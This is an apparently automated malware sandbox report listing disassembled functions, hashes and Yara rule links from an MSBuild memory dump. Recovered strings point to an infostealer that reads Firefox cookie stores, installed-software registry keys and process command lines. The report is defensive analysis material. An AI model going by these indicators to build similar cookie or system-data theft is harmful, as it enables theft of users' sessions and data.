                        • Instruction Fuzzy Hash: 9BA13A74E10229DFDB54DF64D894AADBBB2FF88304F1085A9E505AB251EF30A985CF90
                        Function 0676822B Relevance: .7, Instructions: 746COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3462d01054b7ea0176f5895959af342edd235dcf8f746a287532980ef3716e04
                        • Instruction ID: c0ac1ef0c9f7ebcc3739f26356b5bf1d92b5bd51a98eb4b2899faf86ce200f7e
                        • Opcode Fuzzy Hash: 3462d01054b7ea0176f5895959af342edd235dcf8f746a287532980ef3716e04
                        • Instruction Fuzzy Hash: 7B127911E376416AC7F287EBCD48AFFAB89A6152D5F088487FE73B6423E514844086F7
                        Function 067322A0 Relevance: .5, Instructions: 463COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d9364c5be6f744ffa612cbfa28e06f67effdfd38388aa144e7e3666b7b461529
                        • Instruction ID: 0ba997d223e72eebd44ab9ca91ca08af2068c18ec82e62edd20a17e7d64db3ab
                        • Opcode Fuzzy Hash: d9364c5be6f744ffa612cbfa28e06f67effdfd38388aa144e7e3666b7b461529
                        • Instruction Fuzzy Hash: 76128E70E00329CFDB54DF68D854B99BBB2BF84300F148599E509AB256DB35EE86CF90
                        Function 06739068 Relevance: .4, Instructions: 392COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c25d5f785f14e670b8a467f42fb6c6d7de5e114f24c9921c6ec97a6d1fd90769
                        • Instruction ID: 72f6b660330505f333b1dfb9c57654d88adbf29d15f4d354fc990b1f6936c2ac
                        • Opcode Fuzzy Hash: c25d5f785f14e670b8a467f42fb6c6d7de5e114f24c9921c6ec97a6d1fd90769
                        • Instruction Fuzzy Hash: 80E1A230F002288FCB54DB79D854AAEBBF6FF89300F148569E505AB396EE719D45CB90
                        Function 010109FF Relevance: .4, Instructions: 372COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 86759e3ccdfa04901b60a84d9e53603ec13ddbf564a1f8da4a6665077e7a6726
                        • Instruction ID: 670d4b221db40d55eabaaa2b579ccddf92fd373dd5efe6298a7c1f38ecfae460
                        • Opcode Fuzzy Hash: 86759e3ccdfa04901b60a84d9e53603ec13ddbf564a1f8da4a6665077e7a6726
                        • Instruction Fuzzy Hash: E3E13E74E412199FDF44EBA4DD94AAEBBB6EFC8300F104818E405BB399CA399C45DF25
                        Function 01010A10 Relevance: .4, Instructions: 366COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ad9298ab46a3b25049ac38ef156bbcfe328a8e61bcab8ed3be0b2750ca179799
                        • Instruction ID: 9ceb2c2de849b595f9da1d4926e994b6e0bcbbca157ded94529299b212be5eb3
                        • Opcode Fuzzy Hash: ad9298ab46a3b25049ac38ef156bbcfe328a8e61bcab8ed3be0b2750ca179799
                        • Instruction Fuzzy Hash: 9FE13F74E012199FDF44EBA4DD94AAEBBB6EFC8300F104818A405BB359CA399D45DF25
                        Function 01014CE8 Relevance: .3, Instructions: 266COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 75ab1e379003612e6022217a2d0572388ce6b4c0c25f34c551031104e0ebbc8e
                        • Instruction ID: 8a54c0a1b97b2327a17f60e5a1cb8105d00198b0feed5c34c88b2e1f8d2c9948
                        • Opcode Fuzzy Hash: 75ab1e379003612e6022217a2d0572388ce6b4c0c25f34c551031104e0ebbc8e
                        • Instruction Fuzzy Hash: 78B15F71E00209CFDF50CFA9C9857DDBBF2AF88714F148529E455EB2A8EB789845CB81
                        Function 010118C8 Relevance: 10.2, Strings: 8, Instructions: 194COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$[^\u0020-\u007F]Profilesmoz_cookies$$kq$$kq$$kq$$kq
                        • API String ID: 0-3518583002
                        • Opcode ID: 9624deee7ee9787694c4594bf8a91f3ebbaf1d9bce88b7c22d40a84a250a047e
                        • Instruction ID: 74cc671d1828e8005ff74a61655aee7cef5322f9768a17e34af9930abaa829bf
                        • Opcode Fuzzy Hash: 9624deee7ee9787694c4594bf8a91f3ebbaf1d9bce88b7c22d40a84a250a047e
                        • Instruction Fuzzy Hash: BC71C231A006099BDB19EF75C8502AAB7F3BF85300F248569D586A7399EF7D9D81C780
                        Function 0676F863 Relevance: 8.0, Strings: 6, Instructions: 515COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4ckq$4ckq$4ckq$Xoq$$kq$ckq
                        • API String ID: 0-3835947101
                        • Opcode ID: 365273b4106130a0caaf1ed2e3d281c495ddadcd9e47137b7af8635def29d986
                        • Instruction ID: c54d5b281c94b939e3203dae7529d4973633ca8ba0d4efa9515e487320d8bc22
                        • Opcode Fuzzy Hash: 365273b4106130a0caaf1ed2e3d281c495ddadcd9e47137b7af8635def29d986
                        • Instruction Fuzzy Hash: DD122C34B00209CFDB54DF6AD59466E7BB7BF88304F244568E8069B3A5DB38ED46CB90
                        Function 01011C20 Relevance: 6.5, Strings: 5, Instructions: 238COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: , CommandLine: $, Name: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$ID: CommandLine$NameUNKNOWN$ProcessId
                        • API String ID: 0-612052362
                        • Opcode ID: d290645c75cd746092bce2cdebac78aca122cacf618b63dea961b30db18ee841
                        • Instruction ID: 8e7a63c8cd9f268ffaa2acad3d3cbd02ee82b20570f82cc8d62a3de1f2bed92f
                        • Opcode Fuzzy Hash: d290645c75cd746092bce2cdebac78aca122cacf618b63dea961b30db18ee841
                        • Instruction Fuzzy Hash: CE81E331B003059BC709EB74C8602AF7BB6AF95300B24896DE585AB399EF79DC45C780
                        Function 01011C48 Relevance: 6.5, Strings: 5, Instructions: 235COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: , CommandLine: $, Name: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$ID: CommandLine$NameUNKNOWN$ProcessId
                        • API String ID: 0-612052362
                        • Opcode ID: e239090de7da554f01331a0d6d31e0e238d3296e1dca2fb3792da9112da4970f
                        • Instruction ID: 5f2137452f3146e6f6a97cffb507c212e3284962ebf25939811e8cf9e68a3e12
                        • Opcode Fuzzy Hash: e239090de7da554f01331a0d6d31e0e238d3296e1dca2fb3792da9112da4970f
                        • Instruction Fuzzy Hash: CC818F71B002059FC718EB78C95469E77B6AF99300B60853CE54AEB3A9EF79DD81C780
                        Function 010118A0 Relevance: 5.2, Strings: 4, Instructions: 150COMMON
                        Download Yara Rule
                        Strings
                        • [^\u0020-\u007F]Profilesmoz_cookies, xrefs: 01011ACC
                        • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 01011905
                        • $kq, xrefs: 010119CF
                        • $kq, xrefs: 01011A42
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$[^\u0020-\u007F]Profilesmoz_cookies$$kq$$kq
                        • API String ID: 0-3471439900
                        • Opcode ID: 251b2f09de6821b67660aef905e82c3d740dc9400dc3a85e44a7df65e54b96a8
                        • Instruction ID: d18ae851f80a74f2d93174cbe2726e80af80aaf305df2d23e7101d64d2a24435
                        • Opcode Fuzzy Hash: 251b2f09de6821b67660aef905e82c3d740dc9400dc3a85e44a7df65e54b96a8
                        • Instruction Fuzzy Hash: 5751D331A013059FDB19DF74C8A02AA7BF2BF8A300F1485ADD5819B29AEB7D9985C750
                        Function 01011B42 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: [^\u0020-\u007F]Profilesmoz_cookies$$kq$$kq
                        • API String ID: 0-292677660
                        • Opcode ID: 763440aafada6f4f1fdf5038e8c26b81c55cfd5741fa29d3d1f0051b766f7dfd
                        • Instruction ID: cab506632a0eb3e9a8853823e11802f71763d615f7ec4ebb71bc49d1a5d28d4f
                        • Opcode Fuzzy Hash: 763440aafada6f4f1fdf5038e8c26b81c55cfd5741fa29d3d1f0051b766f7dfd
                        • Instruction Fuzzy Hash: 0A41C631A00306DFDB29DF74C5903AEBBF2BF45300F208569D582A7299EB7C9980CB90
                        Function 0676AA38 Relevance: 3.2, Strings: 2, Instructions: 706COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: (oq$(oq
                        • API String ID: 0-3207256227
                        • Opcode ID: ae6467c16865579c63242bab1e565dd0486db170f296188e48140a3ab1d176ba
                        • Instruction ID: 34f3fd377408c5d57de68444ebc969c179d7f78c951c1675fb2ffe0a5437ca45
                        • Opcode Fuzzy Hash: ae6467c16865579c63242bab1e565dd0486db170f296188e48140a3ab1d176ba
                        • Instruction Fuzzy Hash: B032C134B002149FCB45AB7AD85866E7FF6EFC9300B144469E906DB3A6DE35DC06CB91
                        Function 0676C7E8 Relevance: 2.9, Strings: 2, Instructions: 352COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: LjNp$PHkq
                        • API String ID: 0-2690446067
                        • Opcode ID: aff8bbf106f2c345e2d61361cb01f8e091c88ba0809a13c5c5c804e4bc0bb353
                        • Instruction ID: 9afe4e5dd533b3388a1dfe12923a0c248f32cad09143de8525a6d7c492f056ed
                        • Opcode Fuzzy Hash: aff8bbf106f2c345e2d61361cb01f8e091c88ba0809a13c5c5c804e4bc0bb353
                        • Instruction Fuzzy Hash: 80D19C74B002159FCB55DF6AD884AAEBBF2FF88310F148569E9459B365DB30EC41CBA0
                        Function 06730040 Relevance: 2.8, Strings: 2, Instructions: 302COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'kq$4'kq
                        • API String ID: 0-4171853269
                        • Opcode ID: ee7dd0110c2c638de13024c19e405e62480399c0b719cba232b1e825ee06ce23
                        • Instruction ID: c7b31a766f9cc3e05c57a67cac9ea493c3149735a408faf2ebffc78838c81f28
                        • Opcode Fuzzy Hash: ee7dd0110c2c638de13024c19e405e62480399c0b719cba232b1e825ee06ce23
                        • Instruction Fuzzy Hash: DBB18D70B002198FDB54DF79C8546AEBBF6BF88300F14846AE506EB392DA35D946CB90
                        Function 0673A782 Relevance: 2.8, Strings: 2, Instructions: 298COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: (oq$d
                        • API String ID: 0-886291620
                        • Opcode ID: 49cbbce01f5904b8bcc00d3f609145afd80cb2f0273f3100c7bedf05f26c0c76
                        • Instruction ID: e8daab6afd44de674659fd84069de423f39bfcc0177badb6ce23f51b5a5c43fe
                        • Opcode Fuzzy Hash: 49cbbce01f5904b8bcc00d3f609145afd80cb2f0273f3100c7bedf05f26c0c76
                        • Instruction Fuzzy Hash: B4C16A35600616CFCB14CF18C58096AB7F2FF88314B26C969E59A9B766DB34FC46CB90
                        Function 0673E138 Relevance: 2.8, Strings: 2, Instructions: 297COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: (_kq$4'kq
                        • API String ID: 0-3454555797
                        • Opcode ID: 01187aefcd3b105ca442cfa0b840df62cb0bf98c2abe0d51a682bc58c8ac6348
                        • Instruction ID: 46d401ce8e807452d0da820e476d0cfcf4c8bde8aad82c35f8ab263f55dc1a38
                        • Opcode Fuzzy Hash: 01187aefcd3b105ca442cfa0b840df62cb0bf98c2abe0d51a682bc58c8ac6348
                        • Instruction Fuzzy Hash: 36B1A130A102188FCB14DFB9D854AADBBF2BF89300F14846AE506EB391DF749D46CB91
                        Function 0673AA58 Relevance: 2.7, Strings: 2, Instructions: 243COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: xoq$xoq
                        • API String ID: 0-3123636005
                        • Opcode ID: 2aac46d30a135b9f63e0f7d9e7e78b3d9108221adb7ea1d7b2ff9d076d3e4467
                        • Instruction ID: a6593f65214f9957ded69d97c2f76ff8c0dd3dc7e1ba1ed9f751a8c3fff33b45
                        • Opcode Fuzzy Hash: 2aac46d30a135b9f63e0f7d9e7e78b3d9108221adb7ea1d7b2ff9d076d3e4467
                        • Instruction Fuzzy Hash: AF91C070A003148FC755DF39D944AAABBF2FF85304B24C96DD0569B3A6DB36E806CB90
                        Function 0676D978 Relevance: 2.7, Strings: 2, Instructions: 220COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: (oq$(oq
                        • API String ID: 0-3207256227
                        • Opcode ID: 97155c3997ae4e1baeadbe7de0b2adf2ccc5db029df1eca5af7625a9ad280726
                        • Instruction ID: 936373429db4bd64bcfc494ae072a1bc7606b93a81cfd69d38b0f641eee78e54
                        • Opcode Fuzzy Hash: 97155c3997ae4e1baeadbe7de0b2adf2ccc5db029df1eca5af7625a9ad280726
                        • Instruction Fuzzy Hash: 81718F35B142148FCB54DF7AD854A2E7BE6EFC9700B188069E905DB3A6DE35DC01CBA1
                        Function 06732C28 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: (oq$(oq
                        • API String ID: 0-3207256227
                        • Opcode ID: 6f7b3dd5fc4f131123088521086cdd7abcccc0357d3a864a2c4f30573c3865c9
                        • Instruction ID: 6a757033a0b3a38d63b1da310d636e237e9905fdfc50d84ccae971315c2ae20f
                        • Opcode Fuzzy Hash: 6f7b3dd5fc4f131123088521086cdd7abcccc0357d3a864a2c4f30573c3865c9
                        • Instruction Fuzzy Hash: B1510231B043544FC755AB7A982462E7FE6EFC6340B14896AD901CB386DE35DD06C7A1
                        Function 01014A60 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: \Vl$\Vl
                        • API String ID: 0-415357090
                        • Opcode ID: db72250778a8f748be13e970e0c01688e07f4a78d96b086f64bcead31e7b8bdc
                        • Instruction ID: 0dd4e08e08b980f84ebe4eb5771ac4b49bcbe93f5685896fe94f5d9c45fe098f
                        • Opcode Fuzzy Hash: db72250778a8f748be13e970e0c01688e07f4a78d96b086f64bcead31e7b8bdc
                        • Instruction Fuzzy Hash: 06715EB0E00209DFDB54CFA9C9857DEBBF2BF88314F148529E455E7268EB789841CB91
                        Function 01014A55 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: \Vl$\Vl
                        • API String ID: 0-415357090
                        • Opcode ID: 878938aeb7bd4a967aeb98413489d6f54abf2e4986bf10fcfa9bc200c65dc7ad
                        • Instruction ID: 6fe4e08aeac1091cfd7feef0c41b35ea0dd042b13166b856da0e23b4e35526ce
                        • Opcode Fuzzy Hash: 878938aeb7bd4a967aeb98413489d6f54abf2e4986bf10fcfa9bc200c65dc7ad
                        • Instruction Fuzzy Hash: C0715AB0E00249DFDB50CFA9C9857DEBBF1BF88314F148169E454EB268EB789841CB91
                        Function 06730A97 Relevance: 2.6, Strings: 2, Instructions: 140COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: \skq$\skq
                        • API String ID: 0-1532619477
                        • Opcode ID: 3ac0be4fd51d0425aa167a6f9022fb9049f18ae9b2001c3f118b53693d967347
                        • Instruction ID: a05104080bf168223ad016473979806bbd55a88418a13e987e779bc88fceb4c9
                        • Opcode Fuzzy Hash: 3ac0be4fd51d0425aa167a6f9022fb9049f18ae9b2001c3f118b53693d967347
                        • Instruction Fuzzy Hash: 3E41F131605264CFC755DB79EC5486A7BE6EFC626830940AAE909CB373DA34DC01C7A0
                        Function 06761DA0 Relevance: 2.6, Strings: 2, Instructions: 84COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: (oq$(oq
                        • API String ID: 0-3207256227
                        • Opcode ID: 1760b9a71442c22a87263e09c088c3d14d00d6338f7110e9457fde5477ab7109
                        • Instruction ID: c8d5bc2661f1a0a2a6047a367db4a0c4a7fbce39e3bcf1cf41393836551e138e
                        • Opcode Fuzzy Hash: 1760b9a71442c22a87263e09c088c3d14d00d6338f7110e9457fde5477ab7109
                        • Instruction Fuzzy Hash: 47317A74B002489FDB84DF7AD855A6EBBF5BF85200F6085A9E801EB392EB35DD01CB51
                        Function 0101D480 Relevance: 2.6, Strings: 2, Instructions: 83COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'kq$4'kq
                        • API String ID: 0-4171853269
                        • Opcode ID: fba9f8029785a05405bdaa598420b2e5f6b34dbc4918e9855548c60f1f86940f
                        • Instruction ID: 3fbf5cd7fd6d9e0cb122a8ff7ac9ac03c0d59b37493e50a835a0db98f692df29
                        • Opcode Fuzzy Hash: fba9f8029785a05405bdaa598420b2e5f6b34dbc4918e9855548c60f1f86940f
                        • Instruction Fuzzy Hash: 8021D1347403144FC728AB3AA52922E7EE7AFC4310B14497DE54AC7399EE38DC068795
                        Function 06730AE0 Relevance: 2.6, Strings: 2, Instructions: 67COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: \skq$\skq
                        • API String ID: 0-1532619477
                        • Opcode ID: 1a07bdbd863021b2b7bfc2094b913b1a6612174c1094a276e9ddbfbbca534412
                        • Instruction ID: 6ff03de42cd249ee1e0e12e90556d9d1b7a211ff40c96bacece465b0ffe903b0
                        • Opcode Fuzzy Hash: 1a07bdbd863021b2b7bfc2094b913b1a6612174c1094a276e9ddbfbbca534412
                        • Instruction Fuzzy Hash: 9E1134302062519FC3058B38EC5496B7BA6EF8625876844AAE504CB3B3CA34EC06CB70
                        Function 0101DAC0 Relevance: 2.0, Instructions: 1978COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3c120bb42a8de7a32a13c9959493af2defd62d09d2d39707c5d9079d51e2d1a8
                        • Instruction ID: 111295c822fd23ebcd8b0fb3aafa4a51328fe462e05dc29afbbd6f867840a6d7
                        • Opcode Fuzzy Hash: 3c120bb42a8de7a32a13c9959493af2defd62d09d2d39707c5d9079d51e2d1a8
                        • Instruction Fuzzy Hash: 9E233039A02344DFCB79AF62CA1465DB732FB59346B20866ADF0256764CBBB8C45DF00
                        Function 0101DAB0 Relevance: 2.0, Instructions: 1977COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 701e10fc6091b6ae2d1e619b72c540a2ade30fd6b50c5eddc50157230fcf7129
                        • Instruction ID: 5b1dd966abb4a828b632d1d221311e0a12c134d6ceda19af9ec94eb1e69275bf
                        • Opcode Fuzzy Hash: 701e10fc6091b6ae2d1e619b72c540a2ade30fd6b50c5eddc50157230fcf7129
                        • Instruction Fuzzy Hash: 18233039A02344DFCB79AF62CA1465DB732FB59346B20866ADF0256764CBBB8C45DF00
                        Function 06768F58 Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: (oq
                        • API String ID: 0-3175707579
                        • Opcode ID: 74c1b45273e955453f179e6543234a8e5ea8d60e7e0c2979508c5e53cd62e39a
                        • Instruction ID: fe3c05cc0887a3eb391afe6060b129988a0bf94e329208aa97a24ccb38ba7d2b
                        • Opcode Fuzzy Hash: 74c1b45273e955453f179e6543234a8e5ea8d60e7e0c2979508c5e53cd62e39a
                        • Instruction Fuzzy Hash: FEB1E030B002059FCB15DB7AC854A6EBBF6EF89310F148569E905D7366DB34EC46CB91
                        Function 0101440C Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: \Vl
                        • API String ID: 0-682378881
                        • Opcode ID: 40a967f0bd4bd4124f35fbe5907806a8610dcd2d1c7a40417003fb7ea938c391
                        • Instruction ID: 7e9a7546a022ecde586917795f554332b8212898400e92dba3783c1a961e196f
                        • Opcode Fuzzy Hash: 40a967f0bd4bd4124f35fbe5907806a8610dcd2d1c7a40417003fb7ea938c391
                        • Instruction Fuzzy Hash: 12B15E70E00219CFDB50CFA8C9857DDBBF2BF49314F148569E855EB2A8EB789845CB81
                        Function 0673BF18 Relevance: 1.5, Strings: 1, Instructions: 267COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: (_kq
                        • API String ID: 0-2183774854
                        • Opcode ID: 2f9afb42836660b81799d46651e23a887aa430cabbb8187ecbde894d3acfdd38
                        • Instruction ID: 5db8ff71031e59403373f86a3fc4d1ed50d503f5dd318e981e5daaec20af6f7a
                        • Opcode Fuzzy Hash: 2f9afb42836660b81799d46651e23a887aa430cabbb8187ecbde894d3acfdd38
                        • Instruction Fuzzy Hash: 0AA1BC71A002288FCB55EF78D8945AEBBF2FF89310F148569E805EB356DB31E945CB90
                        Function 06762541 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: (oq
                        • API String ID: 0-3175707579
                        • Opcode ID: d01e6b5a391949f783d9fefbf06eb4d8395d0ded519cb780f14e9e33d5b0dd21
                        • Instruction ID: 3f58df69d444206fc7fb4adf99fa4952b6092263931e9020e1ba1bb6a78fe274
